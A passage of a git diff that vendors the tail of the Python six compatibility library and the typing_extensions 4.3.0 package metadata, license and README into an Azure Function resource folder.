+get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, "Return an iterator over the values of a dictionary.") +_add_doc(iteritems, + "Return an iterator over 
the (key, value) pairs of a dictionary.") +_add_doc(iterlists, + "Return an iterator over the (key, [values]) pairs of a dictionary.") + + +if PY3: + def b(s): + return s.encode("latin-1") + + def u(s): + return s + unichr = chr + import struct + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + def b(s): + return s + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + +else: + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec("""exec _code_ in _globs_, _locs_""") + + exec_("""def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""") + + +if sys.version_info[:2] > (3,): + exec_("""def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""") +else: + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. 
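+ # (Byte strings pass through to fp.write() unchanged; only unicode
+ # text is re-encoded here.)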
+ if (isinstance(fp, file) and + isinstance(data, unicode) and + fp.encoding is not None): + errors = getattr(fp, "errors", None) + if errors is None: + errors = "strict" + data = data.encode(fp.encoding, errors) + fp.write(data) + want_unicode = False + sep = kwargs.pop("sep", None) + if sep is not None: + if isinstance(sep, unicode): + want_unicode = True + elif not isinstance(sep, str): + raise TypeError("sep must be None or a string") + end = kwargs.pop("end", None) + if end is not None: + if isinstance(end, unicode): + want_unicode = True + elif not isinstance(end, str): + raise TypeError("end must be None or a string") + if kwargs: + raise TypeError("invalid keyword arguments to print()") + if not want_unicode: + for arg in args: + if isinstance(arg, unicode): + want_unicode = True + break + if want_unicode: + newline = unicode("\n") + space = unicode(" ") + else: + newline = "\n" + space = " " + if sep is None: + sep = space + if end is None: + end = newline + for i, arg in enumerate(args): + if i: + write(sep) + write(arg) + write(end) +if sys.version_info[:2] < (3, 3): + _print = print_ + + def print_(*args, **kwargs): + fp = kwargs.get("file", sys.stdout) + flush = kwargs.pop("flush", False) + _print(*args, **kwargs) + if flush and fp is not None: + fp.flush() + +_add_doc(reraise, """Reraise an exception.""") + +if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper(wrapper, wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + + def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + return functools.partial(_update_wrapper, wrapped=wrapped, + assigned=assigned, updated=updated) + wraps.__doc__ = functools.wraps.__doc__ + +else: + wraps = functools.wraps + + +def with_metaclass(meta, *bases): + """Create a base class with a metaclass.""" + # This requires a bit of explanation: the basic idea is to make a dummy + # metaclass for one level of class instantiation that replaces itself with + # the actual metaclass. + class metaclass(type): + + def __new__(cls, name, this_bases, d): + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). 
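+                # (Hedged editor's note: types.resolve_bases() expands any
+                # entry in ``bases`` that defines __mro_entries__ into real
+                # classes, mirroring what __build_class__ does; when that
+                # changes the tuple, the original bases are preserved below
+                # under d['__orig_bases__'], as PEP 560 specifies.)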
+ resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d['__orig_bases__'] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + return type.__new__(metaclass, 'temporary_class', (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get('__slots__') + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop('__dict__', None) + orig_vars.pop('__weakref__', None) + if hasattr(cls, '__qualname__'): + orig_vars['__qualname__'] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + return wrapper + + +def ensure_binary(s, encoding='utf-8', errors='strict'): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding='utf-8', errors='strict'): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding='utf-8', errors='strict'): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if '__str__' not in klass.__dict__: + raise ValueError("@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % + klass.__name__) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode('utf-8') + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) 
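+# (Hedged editor's note: each fresh import of six appends a new
+# _SixMetaPathImporter, so without the sweep below sys.meta_path would
+# accumulate stale importers left over from the earlier, discarded module
+# instance.)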
+if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if (type(importer).__name__ == "_SixMetaPathImporter" and + importer.name == __name__): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/LICENSE new file mode 100644 index 0000000..d41be44 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/LICENSE @@ -0,0 +1,254 @@ +A. HISTORY OF THE SOFTWARE +========================== + +Python was created in the early 1990s by Guido van Rossum at Stichting +Mathematisch Centrum (CWI, see http://www.cwi.nl) in the Netherlands +as a successor of a language called ABC. Guido remains Python's +principal author, although it includes many contributions from others. + +In 1995, Guido continued his work on Python at the Corporation for +National Research Initiatives (CNRI, see http://www.cnri.reston.va.us) +in Reston, Virginia where he released several versions of the +software. + +In May 2000, Guido and the Python core development team moved to +BeOpen.com to form the BeOpen PythonLabs team. In October of the same +year, the PythonLabs team moved to Digital Creations (now Zope +Corporation, see http://www.zope.com). In 2001, the Python Software +Foundation (PSF, see http://www.python.org/psf/) was formed, a +non-profit organization created specifically to own Python-related +Intellectual Property. Zope Corporation is a sponsoring member of +the PSF. + +All Python releases are Open Source (see http://www.opensource.org for +the Open Source Definition). Historically, most, but not all, Python +releases have also been GPL-compatible; the table below summarizes +the various releases. + + Release Derived Year Owner GPL- + from compatible? (1) + + 0.9.0 thru 1.2 1991-1995 CWI yes + 1.3 thru 1.5.2 1.2 1995-1999 CNRI yes + 1.6 1.5.2 2000 CNRI no + 2.0 1.6 2000 BeOpen.com no + 1.6.1 1.6 2001 CNRI yes (2) + 2.1 2.0+1.6.1 2001 PSF no + 2.0.1 2.0+1.6.1 2001 PSF yes + 2.1.1 2.1+2.0.1 2001 PSF yes + 2.1.2 2.1.1 2002 PSF yes + 2.1.3 2.1.2 2002 PSF yes + 2.2 and above 2.1.1 2001-now PSF yes + +Footnotes: + +(1) GPL-compatible doesn't mean that we're distributing Python under + the GPL. All Python licenses, unlike the GPL, let you distribute + a modified version without making your changes open source. The + GPL-compatible licenses make it possible to combine Python with + other software that is released under the GPL; the others don't. 
+ +(2) According to Richard Stallman, 1.6.1 is not GPL-compatible, + because its license has a choice of law clause. According to + CNRI, however, Stallman's lawyer has told CNRI's lawyer that 1.6.1 + is "not incompatible" with the GPL. + +Thanks to the many outside volunteers who have worked under Guido's +direction to make these releases possible. + + +B. TERMS AND CONDITIONS FOR ACCESSING OR OTHERWISE USING PYTHON +=============================================================== + +PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2 +-------------------------------------------- + +1. This LICENSE AGREEMENT is between the Python Software Foundation +("PSF"), and the Individual or Organization ("Licensee") accessing and +otherwise using this software ("Python") in source or binary form and +its associated documentation. + +2. Subject to the terms and conditions of this License Agreement, PSF hereby +grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce, +analyze, test, perform and/or display publicly, prepare derivative works, +distribute, and otherwise use Python alone or in any derivative version, +provided, however, that PSF's License Agreement and PSF's notice of copyright, +i.e., "Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, +2011, 2012, 2013, 2014 Python Software Foundation; All Rights Reserved" are +retained in Python alone or in any derivative version prepared by Licensee. + +3. In the event Licensee prepares a derivative work that is based on +or incorporates Python or any part thereof, and wants to make +the derivative work available to others as provided herein, then +Licensee hereby agrees to include in any such work a brief summary of +the changes made to Python. + +4. PSF is making Python available to Licensee on an "AS IS" +basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR +IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND +DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS +FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT +INFRINGE ANY THIRD PARTY RIGHTS. + +5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON +FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS +A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON, +OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +6. This License Agreement will automatically terminate upon a material +breach of its terms and conditions. + +7. Nothing in this License Agreement shall be deemed to create any +relationship of agency, partnership, or joint venture between PSF and +Licensee. This License Agreement does not grant permission to use PSF +trademarks or trade name in a trademark sense to endorse or promote +products or services of Licensee, or any third party. + +8. By copying, installing or otherwise using Python, Licensee +agrees to be bound by the terms and conditions of this License +Agreement. + + +BEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0 +------------------------------------------- + +BEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1 + +1. This LICENSE AGREEMENT is between BeOpen.com ("BeOpen"), having an +office at 160 Saratoga Avenue, Santa Clara, CA 95051, and the +Individual or Organization ("Licensee") accessing and otherwise using +this software in source or binary form and its associated +documentation ("the Software"). + +2. 
Subject to the terms and conditions of this BeOpen Python License +Agreement, BeOpen hereby grants Licensee a non-exclusive, +royalty-free, world-wide license to reproduce, analyze, test, perform +and/or display publicly, prepare derivative works, distribute, and +otherwise use the Software alone or in any derivative version, +provided, however, that the BeOpen Python License is retained in the +Software, alone or in any derivative version prepared by Licensee. + +3. BeOpen is making the Software available to Licensee on an "AS IS" +basis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR +IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND +DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS +FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT +INFRINGE ANY THIRD PARTY RIGHTS. + +4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE +SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS +AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY +DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +5. This License Agreement will automatically terminate upon a material +breach of its terms and conditions. + +6. This License Agreement shall be governed by and interpreted in all +respects by the law of the State of California, excluding conflict of +law provisions. Nothing in this License Agreement shall be deemed to +create any relationship of agency, partnership, or joint venture +between BeOpen and Licensee. This License Agreement does not grant +permission to use BeOpen trademarks or trade names in a trademark +sense to endorse or promote products or services of Licensee, or any +third party. As an exception, the "BeOpen Python" logos available at +http://www.pythonlabs.com/logos.html may be used according to the +permissions granted on that web page. + +7. By copying, installing or otherwise using the software, Licensee +agrees to be bound by the terms and conditions of this License +Agreement. + + +CNRI LICENSE AGREEMENT FOR PYTHON 1.6.1 +--------------------------------------- + +1. This LICENSE AGREEMENT is between the Corporation for National +Research Initiatives, having an office at 1895 Preston White Drive, +Reston, VA 20191 ("CNRI"), and the Individual or Organization +("Licensee") accessing and otherwise using Python 1.6.1 software in +source or binary form and its associated documentation. + +2. Subject to the terms and conditions of this License Agreement, CNRI +hereby grants Licensee a nonexclusive, royalty-free, world-wide +license to reproduce, analyze, test, perform and/or display publicly, +prepare derivative works, distribute, and otherwise use Python 1.6.1 +alone or in any derivative version, provided, however, that CNRI's +License Agreement and CNRI's notice of copyright, i.e., "Copyright (c) +1995-2001 Corporation for National Research Initiatives; All Rights +Reserved" are retained in Python 1.6.1 alone or in any derivative +version prepared by Licensee. Alternately, in lieu of CNRI's License +Agreement, Licensee may substitute the following text (omitting the +quotes): "Python 1.6.1 is made available subject to the terms and +conditions in CNRI's License Agreement. This Agreement together with +Python 1.6.1 may be located on the Internet using the following +unique, persistent identifier (known as a handle): 1895.22/1013. 
This +Agreement may also be obtained from a proxy server on the Internet +using the following URL: http://hdl.handle.net/1895.22/1013". + +3. In the event Licensee prepares a derivative work that is based on +or incorporates Python 1.6.1 or any part thereof, and wants to make +the derivative work available to others as provided herein, then +Licensee hereby agrees to include in any such work a brief summary of +the changes made to Python 1.6.1. + +4. CNRI is making Python 1.6.1 available to Licensee on an "AS IS" +basis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR +IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND +DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS +FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6.1 WILL NOT +INFRINGE ANY THIRD PARTY RIGHTS. + +5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON +1.6.1 FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS +A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 1.6.1, +OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +6. This License Agreement will automatically terminate upon a material +breach of its terms and conditions. + +7. This License Agreement shall be governed by the federal +intellectual property law of the United States, including without +limitation the federal copyright law, and, to the extent such +U.S. federal law does not apply, by the law of the Commonwealth of +Virginia, excluding Virginia's conflict of law provisions. +Notwithstanding the foregoing, with regard to derivative works based +on Python 1.6.1 that incorporate non-separable material that was +previously distributed under the GNU General Public License (GPL), the +law of the Commonwealth of Virginia shall govern this License +Agreement only as to issues arising under or with respect to +Paragraphs 4, 5, and 7 of this License Agreement. Nothing in this +License Agreement shall be deemed to create any relationship of +agency, partnership, or joint venture between CNRI and Licensee. This +License Agreement does not grant permission to use CNRI trademarks or +trade name in a trademark sense to endorse or promote products or +services of Licensee, or any third party. + +8. By clicking on the "ACCEPT" button where indicated, or by copying, +installing or otherwise using Python 1.6.1, Licensee agrees to be +bound by the terms and conditions of this License Agreement. + + ACCEPT + + +CWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2 +-------------------------------------------------- + +Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam, +The Netherlands. All rights reserved. + +Permission to use, copy, modify, and distribute this software and its +documentation for any purpose and without fee is hereby granted, +provided that the above copyright notice appear in all copies and that +both that copyright notice and this permission notice appear in +supporting documentation, and that the name of Stichting Mathematisch +Centrum or CWI not be used in advertising or publicity pertaining to +distribution of the software without specific, written prior +permission. 
+ +STICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO +THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND +FITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE +FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT +OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/METADATA new file mode 100644 index 0000000..4434e70 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/METADATA @@ -0,0 +1,176 @@ +Metadata-Version: 2.1 +Name: typing_extensions +Version: 4.3.0 +Summary: Backported and Experimental Type Hints for Python 3.7+ +Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing +Author-email: "Guido van Rossum, Jukka Lehtosalo, Łukasz Langa, Michael Lee" +Requires-Python: >=3.7 +Description-Content-Type: text/markdown +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Console +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Python Software Foundation License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Topic :: Software Development +Project-URL: Bug Tracker, https://github.com/python/typing_extensions/issues +Project-URL: Changes, https://github.com/python/typing_extensions/blob/main/CHANGELOG.md +Project-URL: Documentation, https://typing.readthedocs.io/ +Project-URL: Home, https://github.com/python/typing_extensions +Project-URL: Q & A, https://github.com/python/typing/discussions +Project-URL: Repository, https://github.com/python/typing_extensions + +# Typing Extensions + +[![Chat at https://gitter.im/python/typing](https://badges.gitter.im/python/typing.svg)](https://gitter.im/python/typing) + +## Overview + +The `typing_extensions` module serves two related purposes: + +- Enable use of new type system features on older Python versions. For example, + `typing.TypeGuard` is new in Python 3.10, but `typing_extensions` allows + users on Python 3.6 through 3.9 to use it too. +- Enable experimentation with new type system PEPs before they are accepted and + added to the `typing` module. + +New features may be added to `typing_extensions` as soon as they are specified +in a PEP that has been added to the [python/peps](https://github.com/python/peps) +repository. If the PEP is accepted, the feature will then be added to `typing` +for the next CPython release. No typing PEP has been rejected so far, so we +haven't yet figured out how to deal with that possibility. + +Starting with version 4.0.0, `typing_extensions` uses +[Semantic Versioning](https://semver.org/). The +major version is incremented for all backwards-incompatible changes. 
+Therefore, it's safe to depend +on `typing_extensions` like this: `typing_extensions >=x.y, <(x+1)`, +where `x.y` is the first version that includes all features you need. + +`typing_extensions` supports Python versions 3.7 and higher. In the future, +support for older Python versions will be dropped some time after that version +reaches end of life. + +## Included items + +This module currently contains the following: + +- Experimental features + + - (Currently none) + +- In `typing` since Python 3.11 + + - `assert_never` + - `assert_type` + - `clear_overloads` + - `@dataclass_transform()` (see PEP 681) + - `get_overloads` + - `LiteralString` (see PEP 675) + - `Never` + - `NotRequired` (see PEP 655) + - `reveal_type` + - `Required` (see PEP 655) + - `Self` (see PEP 673) + - `TypeVarTuple` (see PEP 646) + - `Unpack` (see PEP 646) + +- In `typing` since Python 3.10 + + - `Concatenate` (see PEP 612) + - `ParamSpec` (see PEP 612) + - `ParamSpecArgs` (see PEP 612) + - `ParamSpecKwargs` (see PEP 612) + - `TypeAlias` (see PEP 613) + - `TypeGuard` (see PEP 647) + - `is_typeddict` + +- In `typing` since Python 3.9 + + - `Annotated` (see PEP 593) + +- In `typing` since Python 3.8 + + - `final` (see PEP 591) + - `Final` (see PEP 591) + - `Literal` (see PEP 586) + - `Protocol` (see PEP 544) + - `runtime_checkable` (see PEP 544) + - `TypedDict` (see PEP 589) + - `get_origin` (`typing_extensions` provides this function only in Python 3.7+) + - `get_args` (`typing_extensions` provides this function only in Python 3.7+) + +- In `typing` since Python 3.7 + + - `OrderedDict` + +- In `typing` since Python 3.5 or 3.6 (see [the typing documentation](https://docs.python.org/3.10/library/typing.html) for details) + + - `AsyncContextManager` + - `AsyncGenerator` + - `AsyncIterable` + - `AsyncIterator` + - `Awaitable` + - `ChainMap` + - `ClassVar` (see PEP 526) + - `ContextManager` + - `Coroutine` + - `Counter` + - `DefaultDict` + - `Deque` + - `NamedTuple` + - `NewType` + - `NoReturn` + - `overload` + - `Text` + - `Type` + - `TYPE_CHECKING` + - `get_type_hints` + +# Other Notes and Limitations + +Certain objects were changed after they were added to `typing`, and +`typing_extensions` provides a backport even on newer Python versions: + +- `TypedDict` does not store runtime information + about which (if any) keys are non-required in Python 3.8, and does not + honor the `total` keyword with old-style `TypedDict()` in Python + 3.9.0 and 3.9.1. `TypedDict` also does not support multiple inheritance + with `typing.Generic` on Python <3.11. +- `get_origin` and `get_args` lack support for `Annotated` in + Python 3.8 and lack support for `ParamSpecArgs` and `ParamSpecKwargs` + in 3.9. +- `@final` was changed in Python 3.11 to set the `.__final__` attribute. +- `@overload` was changed in Python 3.11 to make function overloads + introspectable at runtime. In order to access overloads with + `typing_extensions.get_overloads()`, you must use + `@typing_extensions.overload`. +- `NamedTuple` was changed in Python 3.11 to allow for multiple inheritance + with `typing.Generic`. + +There are a few types whose interface was modified between different +versions of typing. For example, `typing.Sequence` was modified to +subclass `typing.Reversible` as of Python 3.5.3. + +These changes are _not_ backported to prevent subtle compatibility +issues when mixing the differing implementations of modified classes. 
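+
+As a hedged, editor-supplied illustration of the `@overload` note above (the
+`utf8` function is hypothetical, not part of the package), overloads
+registered through `typing_extensions.overload` can be retrieved at runtime:
+
+```python
+from typing_extensions import get_overloads, overload
+
+@overload
+def utf8(value: None) -> None: ...
+@overload
+def utf8(value: str) -> bytes: ...
+def utf8(value):
+    # Runtime implementation; the two stubs above exist for type checkers
+    # and are recorded in the overload registry.
+    return None if value is None else value.encode("utf-8")
+
+print(len(get_overloads(utf8)))  # 2 -- both stub definitions were recorded
+```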
+ +Certain types have incorrect runtime behavior due to limitations of older +versions of the typing module: + +- `ParamSpec` and `Concatenate` will not work with `get_args` and + `get_origin`. Certain PEP 612 special cases in user-defined + `Generic`s are also not available. + +These types are only guaranteed to work for static type checking. + +## Running tests + +To run tests, navigate into the appropriate source directory and run +`test_typing_extensions.py`. + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/RECORD new file mode 100644 index 0000000..eadf0f5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/RECORD @@ -0,0 +1,7 @@ +__pycache__/typing_extensions.cpython-39.pyc,, +typing_extensions-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +typing_extensions-4.3.0.dist-info/LICENSE,sha256=_xfOlOECAk3raHc-scx0ynbaTmWPNzUx8Kwi1oprsa0,12755 +typing_extensions-4.3.0.dist-info/METADATA,sha256=Gc182SCaY3PXonSf1hdCKS9NGE0QLoBnxSS9V9VCOIk,6350 +typing_extensions-4.3.0.dist-info/RECORD,, +typing_extensions-4.3.0.dist-info/WHEEL,sha256=4TfKIB_xu-04bc2iKz6_zFt-gEFEEDU_31HGhqzOCE8,81 +typing_extensions.py,sha256=uZ95U2XP0uVC6SD6OhMsspPxUi7HaLXBIulP58ImWDA,75384 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/WHEEL new file mode 100644 index 0000000..26cc612 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: flit 3.7.1 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions.py new file mode 100644 index 0000000..584d521 --- /dev/null +++ 